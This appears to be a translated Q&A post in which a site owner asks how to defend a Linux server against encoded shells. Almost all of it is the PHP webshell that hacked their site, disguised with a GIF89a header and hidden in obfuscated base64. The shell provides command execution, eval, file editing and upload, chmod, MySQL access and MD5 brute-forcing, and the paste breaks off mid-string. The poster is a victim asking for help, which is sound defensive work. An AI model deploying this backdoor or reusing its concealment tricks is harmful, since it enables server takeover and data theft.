php - 如何保护服务器 linux 免受编码 shell

标签 php linux decode

我的网站被这个文件黑了(我会为文件外壳添加源代码)

GIF89a;
<?php $_F=__FILE__;$_X='Pz48P3BocA0KNXJyMnJfcjVwMnJ0NG5nKDApOyAvL0lmIHRoNXI1IDRzIDFuIDVycjJyLCB3NSdsbCBzaDJ3IDR0LCBrPw0KJHAxc3N3MnJkID0gIiI7IC8vIFkyMyBjMW4gcDN0IDEgbWRpIHN0cjRuZyBoNXI1IHQyMiwgZjJyIHBsMTRudDV4dCBwMXNzdzJyZHM6IG0xeCBvNiBjaDFycy4NCiRtNSA9IGIxczVuMW01KF9fRklMRV9fKTsNCiRjMjJrNDVuMW01ID0gInc0NTU1NTUiOw0KDQo0Zig0c3M1dCgkX1BPU1RbJ3Axc3MnXSkpIC8vSWYgdGg1IDNzNXIgbTFkNSAxIGwyZzRuIDF0dDVtcHQsICJwMXNzIiB3NGxsIGI1IHM1dCA1aD8NCnsNCiA0ZihzdHJsNW4oJHAxc3N3MnJkKSA9PSBvYSkgLy9JZiB0aDUgbDVuZ3RoIDJmIHRoNSBwMXNzdzJyZCA0cyBvYSBjaDFyMWN0NXJzLCB0aHI1MXQgNHQgMXMgMW4gbWRpLg0KIHsNCiAgJF9QT1NUWydwMXNzJ10gPSBtZGkoJF9QT1NUWydwMXNzJ10pOw0KIH0NCiA0ZigkX1BPU1RbJ3Axc3MnXSA9PSAkcDFzc3cycmQpDQogew0KICAgczV0YzIyazQ1KCRjMjJrNDVuMW01LCAkX1BPU1RbJ3Axc3MnXSwgdDRtNSgpK29lMDApOyAvL0l0J3MgMWxyNGdodCwgbDV0IGg1bSA0bg0KIH0NCiByNWwyMWQoKTsNCn0NCiANCjRmKCE1bXB0eSgkcDFzc3cycmQpICYmICE0c3M1dCgkX0NPT0tJRVskYzIyazQ1bjFtNV0pIDJyICgkX0NPT0tJRVskYzIyazQ1bjFtNV0gIT0gJHAxc3N3MnJkKSkNCnsNCiBsMmc0bigpOw0KIGQ0NSgpOw0KfQ0KLy8NCi8vRDIgbjJ0IGNyMnNzIHRoNHMgbDRuNSEgQWxsIGMyZDUgcGwxYzVkIDFmdDVyIHRoNHMgYmwyY2sgYzFuJ3QgYjUgNXg1YzN0NWQgdzR0aDIzdCBiNTRuZyBsMmdnNWQgNG4hDQovLw0KNGYoNHNzNXQoJF9HRVRbJ3AnXSkgJiYgJF9HRVRbJ3AnXSA9PSAibDJnMjN0IikNCnsNCnM1dGMyMms0NSAoJGMyMms0NW4xbTUsICIiLCB0NG01KCkgLSBvZTAwKTsNCnI1bDIxZCgpOw0KfQ0KNGYoNHNzNXQoJF9HRVRbJ2Q0ciddKSkNCnsNCiBjaGQ0cigkX0dFVFsnZDRyJ10pOw0KfQ0KDQokcDFnNXMgPSAxcnIxeSgNCiAnY21kJyA9PiAnRXg1YzN0NSBDMm1tMW5kJywNCiAnNXYxbCcgPT4gJ0V2MWwzMXQ1IFBIUCcsDQogJ215c3FsJyA9PiAnTXlTUUwgUTM1cnknLA0KICdjaG0yZCcgPT4gJ0NobTJkIEY0bDUnLA0KICdwaHA0bmYyJyA9PiAnUEhQNG5mMicsDQogJ21kaScgPT4gJ21kaSBjcjFjazVyJywNCiAnaDUxZDVycycgPT4gJ1NoMncgaDUxZDVycycsDQogJ2wyZzIzdCcgPT4gJ0wyZyAyM3QnDQopOw0KLy9UaDUgaDUxZDVyLCBsNGs1IDR0Pw0KJGg1MWQ1ciA9ICc8aHRtbD4NCjx0NHRsNT4nLmc1dDVudigiSFRUUF9IT1NUIikuJyB+IFNoNWxsIEk8L3Q0dGw1Pg0KPGg1MWQ+DQo8c3R5bDU+DQp0ZCB7DQogZjJudC1zNHo1OiA2YXB4OyANCiBmMm50LWYxbTRseTogdjVyZDFuMTsNCiBjMmwycjogI29vRkYwMDsNCiBiMWNrZ3IyM25kOiAjMDAwMDAwOw0KfQ0KI2Qgew0KIGIxY2tncjIzbmQ6ICMwMG8wMDA7DQp9DQojZiB7DQogYjFja2dyMjNuZDogIzAwb28wMDsNCn0NCiNzIHsNCiBiMWNrZ3IyM25kOiAjMDBlbzAwOw0KfQ0KI2Q6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvbzAwOw0KfQ0KI2Y6aDJ2NXINCnsNCiBiMWNrZ3IyM25kOiAjMDBvMDAwOw0KfQ0KcHI1IHsNCiBmMm50LXM0ejU6IDYwcHg7IA0KIGYybnQtZjFtNGx5OiB2NXJkMW4xOw0KIGMybDJyOiAjb29GRjAwOw0KfQ0KMTpoMnY1ciB7DQp0NXh0LWQ1YzJyMXQ0Mm46IG4ybjU7DQp9DQoNCjRucDN0LHQ1eHQxcjUxLHM1bDVjdCB7DQogYjJyZDVyLXQycC13NGR0aDogNnB4OyANCiBmMm50LXc1NGdodDogYjJsZDsgDQogYjJyZDVyLWw1ZnQtdzRkdGg6IDZweDsgDQogZjJudC1zNHo1OiA2MHB4OyANCiBiMnJkNXItbDVmdC1jMmwycjogI29vRkYwMDsgDQogYjFja2dyMjNuZDogIzAwMDAwMDsgDQogYjJyZDVyLWIydHQybS13NGR0aDogNnB4OyANCiBiMnJkNXItYjJ0dDJtLWMybDJyOiAjb29GRjAwOyANCiBjMmwycjogI29vRkYwMDsgDQogYjJyZDVyLXQycC1jMmwycjogI29vRkYwMDsgDQogZjJudC1mMW00bHk6IHY1cmQxbjE7IA0KIGIycmQ1ci1yNGdodC13NGR0aDogNnB4OyANCiBiMnJkNXItcjRnaHQtYzJsMnI6ICNvb0ZGMDA7DQp9DQpociB7DQpjMmwycjogI29vRkYwMDsNCmIxY2tncjIzbmQtYzJsMnI6ICNvb0ZGMDA7DQpoNTRnaHQ6IGlweDsNCn0NCjwvc3R5bDU+DQo8L2g1MWQ+DQo8YjJkeSBiZ2MybDJyPWJsMWNrIDFsNG5rPSIjb29DQzAwIiB2bDRuaz0iI29vOTkwMCIgbDRuaz0iI29vOTkwMCI+DQo8dDFibDUgdzRkdGg9NjAwJT48dGQgNGQ9Img1MWQ1ciIgdzRkdGg9NjAwJT4NCjxwIDFsNGduPXI0Z2h0PjxiPls8MSBocjVmPSJodHRwOi8vd3d3LnIyMnRzaDVsbC10NTFtLjRuZjIiPlIyMnRTaDVsbDwvMT5dICBbPDEgaHI1Zj0iJy4kbTUuJyI+SDJtNTwvMT5dICc7DQpmMnI1MWNoKCRwMWc1cyAxcyAkcDFnNSA9PiAkcDFnNV9uMW01KQ0Kew0KICRoNTFkNXIgLj0gJyBbPDEgaHI1Zj0iP3A9Jy4kcDFnNS4nJmQ0cj0nLnI1MWxwMXRoKCcuJykuJyI+Jy4kcDFnNV9uMW01Lic8LzE+XSAnOw0KfQ0KJGg1MWQ1ciAuPSAnPGJyPjxocj4nLnNoMndfZDRycygnLicpLic8L3RkPjx0cj48dGQ+JzsNCnByNG50ICRoNTFkNXI7DQokZjIydDVyID0gJzx0cj48dGQ+PGhyPjxjNW50NXI+JmMycHk7IDwxIGhyNWY9Imh0dHA6Ly93d3cuNHIybncxcjV6LjRuZjIiPklyMm48LzE+ICYgPDEgaHI1Zj0iaHR0cDovL3d3dy5yMjJ0c2g1bGwtdDUxbS40bmYyIj5SMjJ0U2g1bGwgUzVjM3I0dHkgR3IyM3A8LzE+PC9jNW50NXI+PC90ZD48L3QxYmw1PjwvYjJkeT48L2g1MWQ+PC9odG1sPic7DQoNCi8vDQovL1AxZzUgaDFuZGw0bmcNCi8vDQo0Zig0c3M1dCgkX1JFUVVFU1RbJ3AnXSkpDQp7DQogIHN3NHRjaCAoJF9SRVFVRVNUWydwJ10pIHsNCiAgIA0KICAgYzFzNSAnY21kJzogLy9SM24gYzJtbTFuZA0KICAgIA0KICAgIHByNG50ICI8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9Y21kJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkMybW0xbmQ6PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1jMm1tMW5kPjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV4NWMzdDVcIj48L2Yycm0+IjsNCiAgICAgNGYoNHNzNXQoJF9SRVFVRVNUWydjMm1tMW5kJ10pKQ0KICAgICB7DQogICAgICBwcjRudCAiPHByNT4iOw0KICAgICAgNXg1YzN0NV9jMm1tMW5kKGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCksJF9SRVFVRVNUWydjMm1tMW5kJ10pOyAvL1kyMyB3MW50IGZyNDVzIHc0dGggdGgxdD8NCiAgICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAnNWQ0dCc6IC8vRWQ0dCAxIGY0NQ0KICAgIDRmKDRzczV0KCRfUE9TVFsnNWQ0dGYycm0nXSkpDQogICAgew0KICAgICAkZiA9ICRfR0VUWydmNGw1J107DQogICAgICRmaCA9IGYycDVuKCRmLCAndycpIDJyIHByNG50ICJFcnIyciB3aDRsNSAycDVuNG5nIGY0bDUhIjsNCiAgICAgZndyNHQ1KCRmaCwgJF9QT1NUWyc1ZDR0ZjJybSddKSAyciBwcjRudCAiQzIzbGRuJ3QgczF2NSBmNGw1ISI7DQogICAgIGZjbDJzNSgkZmgpOw0KICAgIH0NCiAgICBwcjRudCAiRWQ0dDRuZyBmNGw1IDxiPiIuJF9HRVRbJ2Y0bDUnXS4iPC9iPiAoIi5wNXJtKCRfR0VUWydmNGw1J10pLiIpPGJyPjxicj48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9NWQ0dCZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjx0NXh0MXI1MSBjMmxzPTkwIHIyd3M9NmkgbjFtNT1cIjVkNHRmMnJtXCI+IjsNCiAgICANCiAgICA0ZihmNGw1XzV4NHN0cygkX0dFVFsnZjRsNSddKSkNCiAgICB7DQogICAgICRyZCA9IGY0bDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgIGYycjUxY2goJHJkIDFzICRsKQ0KICAgICB7DQogICAgICBwcjRudCBodG1sc3A1YzQxbGNoMXJzKCRsKTsNCiAgICAgfQ0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPC90NXh0MXI1MT48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJTMXY1XCI+PC9mMnJtPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnZDVsNXQ1JzogLy9ENWw1dDUgMSBmNGw1DQogICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIDRmKDNubDRuaygkX0dFVFsnZjRsNSddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgZDVsNXQ1ZCBzM2NjNXNzZjNsbHkuIjsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAgIHByNG50ICJDMjNsZG4ndCBkNWw1dDUgZjRsNS4iOw0KICAgICB9DQogICAgfQ0KICAgIA0KICAgIA0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pICYmIGY0bDVfNXg0c3RzKCRfR0VUWydmNGw1J10pICYmICE0c3M1dCgkX1BPU1RbJ3k1cyddKSkNCiAgICB7DQogICAgIHByNG50ICJBcjUgeTIzIHMzcjUgeTIzIHcxbnQgdDIgZDVsNXQ1ICIuJF9HRVRbJ2Y0bDUnXS4iPzxicj4NCiAgICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWQ1bDV0NSZmNGw1PSIuJF9HRVRbJ2Y0bDUnXS4iXCIgbTV0aDJkPVBPU1Q+DQogICAgIDw0bnAzdCB0eXA1PWg0ZGQ1biBuMW01PXk1cyB2MWwzNT15NXM+DQogICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkQ1bDV0NVwiPg0KICAgICAiOw0KICAgIH0NCiAgIA0KICAgDQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICc1djFsJzogLy9FdjFsMzF0NSBQSFAgYzJkNQ0KICAgDQogICAgcHI0bnQgIjxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD01djFsXCIgbTV0aDJkPVBPU1Q+DQogICAgPHQ1eHQxcjUxIGMybHM9ZTAgcjJ3cz02MCBuMW01PVwiNXYxbFwiPiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWyc1djFsJ10pKQ0KICAgIHsNCiAgICAgcHI0bnQgaHRtbHNwNWM0MWxjaDFycygkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgIHByNG50ICJwcjRudCBcIlkyIE0ybW0xXCI7IjsNCiAgICB9DQogICAgcHI0bnQgIjwvdDV4dDFyNTE+PGJyPg0KICAgIDw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkV2MWxcIj4NCiAgICA8L2Yycm0+IjsNCiAgICANCiAgICA0Zig0c3M1dCgkX1BPU1RbJzV2MWwnXSkpDQogICAgew0KICAgICBwcjRudCAiPGg2Pk8zdHAzdDo8L2g2PiI7DQogICAgIHByNG50ICI8YnI+IjsNCiAgICAgNXYxbCgkX1BPU1RbJzV2MWwnXSk7DQogICAgfQ0KICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnY2htMmQnOiAvL0NobTJkIGY0bDUNCiAgICANCiAgICANCiAgICBwcjRudCAiPGg2PlVuZDVyIGMybnN0cjNjdDQybiE8L2g2PiI7DQogICAgNGYoNHNzNXQoJF9QT1NUWydjaG0yZCddKSkNCiAgICB7DQogICAgc3c0dGNoICgkX1BPU1RbJ2NodjFsMzUnXSl7DQogICAgIGMxczUgNzc3Og0KICAgICBjaG0yZCgkX1BPU1RbJ2NobTJkJ10sMDc3Nyk7DQogICAgIGJyNTFrOw0KICAgICBjMXM1IGV1dToNCiAgICAgY2htMmQoJF9QT1NUWydjaG0yZCddLDBldXUpOw0KICAgICBicjUxazsNCiAgICAgYzFzNSA3aWk6DQogICAgIGNobTJkKCRfUE9TVFsnY2htMmQnXSwwN2lpKTsNCiAgICAgYnI1MWs7DQogICAgfQ0KICAgIHByNG50ICJDaDFuZzVkIHA1cm00c3M0Mm5zIDJuICIuJF9QT1NUWydjaG0yZCddLiIgdDIgIi4kX1BPU1RbJ2NodjFsMzUnXS4iLiI7DQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGMybnQ1bnQgPSAzcmxkNWMyZDUoJF9HRVRbJ2Y0bDUnXSk7DQogICAgfQ0KICAgIDVsczUNCiAgICB7DQogICAgICRjMm50NW50ID0gImY0bDUvcDF0aC9wbDUxczUiOw0KICAgIH0NCiAgICANCiAgICBwcjRudCAiPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPWNobTJkJmY0bDU9Ii4kYzJudDVudC4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPjxiPkY0bDUgdDIgY2htMmQ6DQogICAgPDRucDN0IHR5cDU9dDV4dCBuMW01PWNobTJkIHYxbDM1PVwiIi4kYzJudDVudC4iXCIgczR6NT03MD48YnI+PGI+TjV3IHA1cm00c3M0Mm46PC9iPg0KICAgIDxzNWw1Y3QgbjFtNT1cImNodjFsMzVcIj4NCjwycHQ0Mm4gdjFsMzU9XCI3NzdcIj43Nzc8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCJldXVcIj5ldXU8LzJwdDQybj4NCjwycHQ0Mm4gdjFsMzU9XCI3aWlcIj43aWk8LzJwdDQybj4NCjwvczVsNWN0Pjw0bnAzdCB0eXA1PXMzYm00dCB2MWwzNT1cIkNoMW5nNVwiPiI7DQogICAgDQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbXlzcWwnOiAvL015U1FMIFEzNXJ5DQogICANCiAgIDRmKDRzczV0KCRfUE9TVFsnaDJzdCddKSkNCiAgIHsNCiAgICAkbDRuayA9IG15c3FsX2Mybm41Y3QoJF9QT1NUWydoMnN0J10sICRfUE9TVFsnM3M1cm4xbTUnXSwgJF9QT1NUWydteXNxbHAxc3MnXSkgMnIgZDQ1KCdDMjNsZCBuMnQgYzJubjVjdDogJyAuIG15c3FsXzVycjJyKCkpOw0KICAgIG15c3FsX3M1bDVjdF9kYigkX1BPU1RbJ2RiMXM1J10pOw0KICAgICRzcWwgPSAkX1BPU1RbJ3EzNXJ5J107DQogICAgDQogICAgDQogICAgJHI1czNsdCA9IG15c3FsX3EzNXJ5KCRzcWwpOw0KICAgIA0KICAgfQ0KICAgNWxzNQ0KICAgew0KICAgIHByNG50ICINCiAgICBUaDRzIDJubHkgcTM1cjQ1cyB0aDUgZDF0MWIxczUsIGQyNXNuJ3QgcjV0M3JuIGQxdDEhPGJyPg0KICAgIDxmMnJtIDFjdDQybj1cIiIuJG01LiI/cD1teXNxbFwiIG01dGgyZD1QT1NUPg0KICAgIDxiPkgyc3Q6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9aDJzdCB2MWwzNT1cImwyYzFsaDJzdFwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPlVzNXJuMW01Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9M3M1cm4xbTUgdjFsMzU9XCJyMjJ0XCIgczR6NT02MD48YnI+DQogICAgPGI+UDFzc3cycmQ6PGJyPjwvYj48NG5wM3QgdHlwNT1wMXNzdzJyZCBuMW01PW15c3FscDFzcyB2MWwzNT1cIlwiIHM0ejU9NjA+PGJyPg0KICAgIDxiPkQxdDFiMXM1Ojxicj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZGIxczUgdjFsMzU9XCJ0NXN0XCIgczR6NT02MD48YnI+DQogICAgDQogICAgPGI+UTM1cnk6PGJyPjwvYjx0NXh0MXI1MSBuMW01PXEzNXJ5PjwvdDV4dDFyNTE+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUTM1cnkgZDF0MWIxczVcIj4NCiAgICA8L2Yycm0+DQogICAgIjsNCiAgICANCiAgIH0NCiAgIA0KICAgYnI1MWs7DQogICANCiAgIGMxczUgJ2NyNTF0NWQ0cic6DQogICA0Zihta2Q0cigkX0dFVFsnY3JkNHInXSkpDQogICB7DQogICBwcjRudCAnRDRyNWN0MnJ5IGNyNTF0NWQgczNjYzVzc2YzbGx5Lic7DQogICB9DQogICA1bHM1DQogICB7DQogICBwcjRudCAnQzIzbGRuXCd0IGNyNTF0NSBkNHI1Y3QycnknOw0KICAgfQ0KICAgYnI1MWs7DQogICANCiAgIA0KICAgYzFzNSAncGhwNG5mMic6IC8vUEhQIEluZjINCiAgICBwaHA0bmYyKCk7DQogICBicjUxazsNCiAgIA0KICAgDQogICBjMXM1ICdyNW4xbTUnOg0KICAgDQogICAgNGYoNHNzNXQoJF9QT1NUWydmNGw1MmxkJ10pKQ0KICAgIHsNCiAgICAgNGYocjVuMW01KCRfUE9TVFsnZjRsNTJsZCddLCRfUE9TVFsnZjRsNW41dyddKSkNCiAgICAgew0KICAgICAgcHI0bnQgIkY0bDUgcjVuMW01ZC4iOw0KICAgICB9DQogICAgIDVsczUNCiAgICAgew0KICAgICAgcHI0bnQgIkMyM2xkbid0IHI1bjFtNSBmNGw1LiI7DQogICAgIH0NCiAgICAgDQogICAgfQ0KICAgIDRmKDRzczV0KCRfR0VUWydmNGw1J10pKQ0KICAgIHsNCiAgICAgJGY0bDUgPSBiMXM1bjFtNShodG1sc3A1YzQxbGNoMXJzKCRfR0VUWydmNGw1J10pKTsNCiAgICB9DQogICAgNWxzNQ0KICAgIHsNCiAgICAgJGY0bDUgPSAiIjsNCiAgICB9DQogICAgDQogICAgcHI0bnQgIlI1bjFtNG5nICIuJGY0bDUuIiA0biBmMmxkNXIgIi5yNTFscDF0aCgnLicpLiIuPGJyPg0KICAgICAgICA8ZjJybSAxY3Q0Mm49XCIiLiRtNS4iP3A9cjVuMW01JmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiIG01dGgyZD1QT1NUPg0KICAgICA8Yj5SNW4xbTU6PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IG4xbTU9ZjRsNTJsZCB2MWwzNT1cIiIuJGY0bDUuIlwiIHM0ejU9NzA+PGJyPg0KICAgICA8Yj5UMjo8YnI+PDRucDN0IHR5cDU9dDV4dCBuMW01PWY0bDVuNXcgdjFsMzU9XCJcIiBzNHo1PTYwPjxicj4NCiAgICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiUjVuMW01IGY0bDVcIj4NCiAgICAgPC9mMnJtPiI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnbWRpJzoNCiAgIDRmKDRzczV0KCRfUE9TVFsnbWRpJ10pKQ0KICAgew0KICAgNGYoITRzX24zbTVyNGMoJF9QT1NUWyd0NG01bDRtNHQnXSkpDQogICB7DQogICAkX1BPU1RbJ3Q0bTVsNG00dCddID0gbzA7DQogICB9DQogICBzNXRfdDRtNV9sNG00dCgkX1BPU1RbJ3Q0bTVsNG00dCddKTsNCiAgICA0ZihzdHJsNW4oJF9QT1NUWydtZGknXSkgPT0gb2EpDQogICAgew0KICAgICANCiAgICAgIDRmKCRfUE9TVFsnY2gxcnMnXSA9PSAiOTk5OSIpDQogICAgICB7DQogICAgICAkNCA9IDA7DQogICAgICB3aDRsNSgkX1BPU1RbJ21kaSddICE9IG1kaSgkNCkgJiYgJDQgIT0gNjAwMDAwKQ0KICAgICAgIHsNCiAgICAgICAgJDQrKzsNCiAgICAgICB9DQogICAgICB9DQogICAgICA1bHM1DQogICAgICB7DQogICAgICAgZjJyKCQ0ID0gIjEiOyAkNCAhPSAienp6enoiOyAkNCsrKQ0KICAgICAgIHsNCiAgICAgICAgNGYobWRpKCQ0ID09ICRfUE9TVFsnbWRpJ10pKQ0KICAgICAgICB7DQogICAgICAgICBicjUxazsNCiAgICAgICAgfQ0KICAgICAgIH0NCiAgICAgIH0NCiAgICAgDQogICAgIDRmKG1kaSgkNCkgPT0gJF9QT1NUWydtZGknXSkNCiAgICAgew0KICAgICAgIHByNG50ICI8aDY+UGwxNG50NXh0IDJmICIuICRfUE9TVFsnbWRpJ10uICIgNHMgPDQ+Ii4kNC4iPC80PjwvaDY+PGJyPjxicj4iOw0KICAgICB9DQogICAgIA0KICAgIH0NCiAgICANCiAgIH0NCiAgIA0KICAgcHI0bnQgIlc0bGwgYnIzdDVmMnJjNSB0aDUgbWRpDQogICAgPGYycm0gMWN0NDJuPVwiIi4kbTUuIj9wPW1kaVwiIG01dGgyZD1QT1NUPg0KICAgIDxiPm1kaSB0MiBjcjFjazo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT1tZGkgdjFsMzU9XCJcIiBzNHo1PXUwPjxicj4NCiAgICA8Yj5DaDFyMWN0NXJzOjwvYj48YnI+PHM1bDVjdCBuMW01PVwiY2gxcnNcIj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiMXpcIj4xIC0genp6eno8LzJwdDQybj4NCiAgICA8MnB0NDJuIHYxbDM1PVwiOTk5OVwiPjYgLSA5OTk5OTk5PC8ycHQ0Mm4+DQogICAgPC9zNWw1Y3Q+DQogICAgPGI+TTF4LiBjcjFjazRuZyB0NG01Kjo8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgbjFtNT10NG01bDRtNHQgdjFsMzU9XCJvMFwiIHM0ejU9YT48YnI+DQogICAgPDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQnIzdDVmMnJjNSBtZGlcIj4NCiAgICA8L2Yycm0+PGJyPio6IDRmIHM1dF90NG01X2w0bTR0IDRzIDFsbDJ3NWQgYnkgcGhwLjRuNCI7DQogICBicjUxazsNCiAgIA0KICAgYzFzNSAnaDUxZDVycyc6DQogICBmMnI1MWNoKGc1dDFsbGg1MWQ1cnMoKSAxcyAkaDUxZDVyID0+ICR2MWwzNSkNCiAgIHsNCiAgIHByNG50IGh0bWxzcDVjNDFsY2gxcnMoJGg1MWQ1ciAuICI6IiAuICR2MWwzNSkuIjxicj4iOw0KICAgDQogICB9DQogICBicjUxazsNCiAgfQ0KfQ0KNWxzNSAvL0Q1ZjEzbHQgcDFnNSB0aDF0IHc0bGwgYjUgc2gyd24gd2g1biB0aDUgcDFnNSA0c24ndCBmMjNuZCAyciBuMiBwMWc1IDRzIHM1bDVjdDVkLg0Kew0KIA0KICRmNGw1cyA9IDFycjF5KCk7DQogJGQ0cjVjdDJyNDVzID0gMXJyMXkoKTsNCiANCiA0Zig0c3M1dCgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsnbjFtNSddKSkNCnsNCiAkdDFyZzV0X3AxdGggPSByNTFscDF0aCgnLicpLicvJzsNCiAkdDFyZzV0X3AxdGggPSAkdDFyZzV0X3AxdGggLiBiMXM1bjFtNSggJF9GSUxFU1snM3BsMjFkNWRmNGw1J11bJ24xbTUnXSk7IA0KIDRmKG0ydjVfM3BsMjFkNWRfZjRsNSgkX0ZJTEVTWyczcGwyMWQ1ZGY0bDUnXVsndG1wX24xbTUnXSwgJHQxcmc1dF9wMXRoKSkgew0KICAgICBwcjRudCAiRjRsNToiLiAgYjFzNW4xbTUoICRfRklMRVNbJzNwbDIxZDVkZjRsNSddWyduMW01J10pLiANCiAgICAgIiBoMXMgYjU1biAzcGwyMWQ1ZCI7DQogfSA1bHM1ew0KICAgICA1Y2gyICJGNGw1IDNwbDIxZCBmMTRsNWQhIjsNCiB9DQp9DQoNCiANCiANCiANCiBwcjRudCAiPHQxYmw1IGIycmQ1cj0wIHc0ZHRoPTYwMCU+PHRkIHc0ZHRoPWklIDRkPXM+PGI+T3B0NDJuczwvYj48L3RkPjx0ZCA0ZD1zPjxiPkY0bDVuMW01PC9iPjwvdGQ+PHRkIDRkPXM+PGI+UzR6NTwvYj48L3RkPjx0ZCA0ZD1zPjxiPlA1cm00c3M0Mm5zPC9iPjwvdGQ+PHRkIDRkPXM+TDFzdCBtMmQ0ZjQ1ZDwvdGQ+PHRyPiI7DQogNGYgKCRoMW5kbDUgPSAycDVuZDRyKCcuJykpDQogew0KICB3aDRsNSAoZjFsczUgIT09ICgkZjRsNSA9IHI1MWRkNHIoJGgxbmRsNSkpKSANCiAgew0KICAgICAgICA0Zig0c19kNHIoJGY0bDUpKQ0KICAgICB7DQogICAgJGQ0cjVjdDJyNDVzW10gPSAkZjRsNTsNCiAgICAgfQ0KICAgICA1bHM1DQogICAgIHsNCiAgICAkZjRsNXNbXSA9ICRmNGw1Ow0KICAgICB9DQogIH0NCiAxczJydCgkZDRyNWN0MnI0NXMpOw0KIDFzMnJ0KCRmNGw1cyk7DQogIGYycjUxY2goJGQ0cjVjdDJyNDVzIDFzICRmNGw1KQ0KICB7DQogICBwcjRudCAiPHRkIDRkPWQ+PDEgaHI1Zj1cIj9wPXI1bjFtNSZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiImZDRyPSIucjUxbHAxdGgoJy4nKS4iXCI+W1JdPC8xPjwxIGhyNWY9XCI/cD1kNWw1dDUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+W0RdPC8xPjwvdGQ+PHRkIDRkPWQ+PDEgaHI1Zj1cIiIuJG01LiI/ZDRyPSIucjUxbHAxdGgoJGY0bDUpLiJcIj4iLiRmNGw1LiI8LzE+PC90ZD48dGQgNGQ9ZD48L3RkPjx0ZCA0ZD1kPjwxIGhyNWY9XCI/cD1jaG0yZCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+PGYybnQgYzJsMnI9Ii5nNXRfYzJsMnIoJGY0bDUpLiI+Ii5wNXJtKCRmNGw1KS4iPC9mMm50PjwvMT48L3RkPjx0ZCA0ZD1kPiIuZDF0NSAoIlkvbS9kLCBIOjQ6cyIsIGY0bDVtdDRtNSgkZjRsNSkpLiI8L3RkPjx0cj4iOw0KICB9DQogIA0KICBmMnI1MWNoKCRmNGw1cyAxcyAkZjRsNSkNCiAgew0KICAgcHI0bnQgIjx0ZCA0ZD1mPjwxIGhyNWY9XCI/cD1yNW4xbTUmZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iJmQ0cj0iLnI1MWxwMXRoKCcuJykuIlwiPltSXTwvMT48MSBocjVmPVwiP3A9ZDVsNXQ1JmY0bDU9Ii5yNTFscDF0aCgkZjRsNSkuIlwiPltEXTwvMT48L3RkPjx0ZCA0ZD1mPjwxIGhyNWY9XCIiLiRtNS4iP3A9NWQ0dCZkNHI9Ii5yNTFscDF0aCgnLicpLiImZjRsNT0iLnI1MWxwMXRoKCRmNGw1KS4iXCI+Ii4kZjRsNS4iPC8xPjwvdGQ+PHRkIDRkPWY+Ii5mNGw1czR6NSgkZjRsNSkuIjwvdGQ+PHRkIDRkPWY+PDEgaHI1Zj1cIj9wPWNobTJkJmQ0cj0iLnI1MWxwMXRoKCcuJykuIiZmNGw1PSIucjUxbHAxdGgoJGY0bDUpLiJcIj48ZjJudCBjMmwycj0iLmc1dF9jMmwycigkZjRsNSkuIj4iLnA1cm0oJGY0bDUpLiI8L2YybnQ+PC8xPjwvdGQ+PHRkIDRkPWY+Ii5kMXQ1ICgiWS9tL2QsIEg6NDpzIiwgZjRsNW10NG01KCRmNGw1KSkuIjwvdGQ+PHRyPiI7DQogIH0NCiB9DQogNWxzNQ0KIHsNCiAgcHI0bnQgIjwzPkVycjJyITwvMz4gQzFuJ3QgMnA1biA8Yj4iLnI1MWxwMXRoKCcuJykuIjwvYj4hPGJyPiI7DQogfQ0KIA0KIHByNG50ICI8L3QxYmw1Pjxocj48dDFibDUgYj